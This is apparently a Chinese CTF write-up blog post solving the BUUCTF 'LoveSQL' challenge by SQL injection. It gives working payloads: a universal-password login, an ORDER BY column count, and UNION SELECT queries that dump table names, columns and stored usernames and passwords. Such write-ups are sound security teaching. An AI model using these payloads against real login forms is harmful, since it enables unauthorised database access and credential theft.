buu-[极客大挑战 2019]LoveSQL

打开题目

 

直接使用万能密码登录下

 

 成功登录

 

 并且获得了用户名和密码

 以为密码就是flag

提交失败,用md5解密也失败了

那就继续注入吧

用order by语句先查一下字段数

 

正常访问

 

报错了

 可知有3个字段

再用union注入测试一下回显的点

username=0' union select 1,2,3%23&password=1

 

 可知回显的点是2和3

接下来就可以爆库和表了

username=0' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

 

 再爆一下字段

username=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

 

 

 

 接下来就是爆字段内容了

?username=0' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

成功

 

 因为页面显示的原因显示不完全

查看源代码,在源代码里搜素flag

 

posted @ 2021-06-08 20:33  c0d1  阅读(70)  评论(0)    收藏  举报